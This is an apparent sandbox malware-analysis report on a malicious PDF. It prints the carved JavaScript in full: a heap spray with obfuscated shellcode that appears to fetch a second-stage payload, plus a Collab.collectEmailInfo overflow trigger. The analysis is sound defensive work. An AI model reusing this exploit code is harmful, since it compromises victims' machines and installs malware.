MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic suggests that the JavaScript content is obfuscated. The extracted JavaScript files, 'javascript_obj111111_000.js' and 'javascript_obj111112_001.js', are likely responsible for downloading and executing a second-stage payload. The obfuscation and the presence of JavaScript point towards a downloader or droppper functionality.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
return unescape(frdwh); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj111111_000.js |
pdf-javascript-stream | PDF /JS object 111111 at offset 0x160 | 2291 bytes |
SHA-256: ca7634ab3ef1303eac00818c5d405e2ebcfcf59a2097bcdfdebcc76c5e678d72 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function xpepds8(frdwh)
{
return unescape(frdwh);
}
var izypgrd = new Array();
var blksjs = 'ARG0c0cARG0c0c'.replace(/ARG/igm,'%u');
var bvcues1 = 'ARG9090ARG9090'.replace(/ARG/igm,'%u');
var ewkvxv7 = 'Z535XZ5251Z5756Z9c55ZXXe8ZXXXXZ5dXXZed83Z31XdZ64cXZ4XX3Z783XZ8bXcZXc4XZ7X8bZad1cZ4X8bZebX8Z8bX9Z344XZ4X8dZ8b7cZ3c4XZ5756Z5ebeZXXX1ZX1XXZbfeeZX14eZXXXXZefX1Zd6e8ZXXX1Z5fXXZ895eZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX263ZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZ78c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX26eZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZa6c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z9dXXZ5f5dZ5a5eZ5b59Zc358ZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ6547Z5474Z6d65Z5X7XZ7461Z4168Z4cXXZ616fZ4c64Z6269Z6172Z7972ZXX41Z6547Z5X74Z6f72Z4163Z6464Z6572Z7373Z57XXZ6e69Z7845Z6365ZbbXXZf289Zf789ZcX3XZ75aeZ29fdZ89f7Z31f9ZbecXZXX3cZXXXXZb5X3ZX21bZXXXXZad66Z85X3ZX21bZXXXXZ7X8bZ8378Z1cc6Zb5X3ZX21bZXXXXZbd8dZX21fZXXXXZX3adZ1b85ZXXX2ZabXXZX3adZ1b85ZXXX2Z5XXXZadabZ85X3ZX21bZXXXXZ5eabZdb31Z56adZ85X3ZX21bZXXXXZc689Zd789Zfc51Za6f3Z7459Z5eX4Zeb43Z5ee9Zd193ZX3eXZ2785ZXXX2Z31XXZ96f6Zad66ZeXc1ZX3X2Z1f85ZXXX2Z89XXZadc6Z85X3ZX21bZXXXXZebc3ZXX1XZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ89XXZ1b85ZXXX2Z56XXZe857Zff58ZffffZ5e5fZX1abZ8XceZbb3eZX274ZedebZ55c3Z4c52Z4f4dZ2e4eZ4c44ZXX4cZ5255Z444cZ776fZ6c6eZ616fZ5464Z466fZ6c69Z4165Z7XXXZ6664Z7X75Z2e64Z7865ZXX65Z7263Z7361Z2e68Z687XZXX7XZ7468Z7X74Z2F3AZ372FZ2E37Z3232Z2E31Z3531Z2E33Z3731Z2F38Z662EZ6867Z2F74Z2E6CZ687XZ3F7XZ3D69ZXX34Z9XXX'.replace(/Z/igm,'%u').replace(/X/igm,'0');
blksjs=xpepds8(blksjs);
bvcues1=xpepds8(bvcues1);
ewkvxv7=xpepds8(ewkvxv7);
while (bvcues1.length * 2 < 0x3fffc8-ewkvxv7.length * 2){bvcues1 += bvcues1;}
bvcues1 = bvcues1.substr(0, (0x3fffc8-ewkvxv7.length * 2) / 2);
for (var fueqeq = 0; fueqeq < 47; fueqeq ++ ){izypgrd[fueqeq] = bvcues1 + ewkvxv7;}
while (blksjs.length < 44952){blksjs += blksjs;}
|
|||
javascript_obj111112_001.js |
pdf-javascript-stream | PDF /JS object 111112 at offset 0x56F | 66 bytes |
SHA-256: ffbfc19840f5fcb731ecb687f38b2af6b61a00efa8d806d9ef3289a23def499e |
|||
Preview scriptFirst 1,000 lines of the extracted script
this.collabStore = Collab.collectEmailInfo({subj:"", msg:blksjs});
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.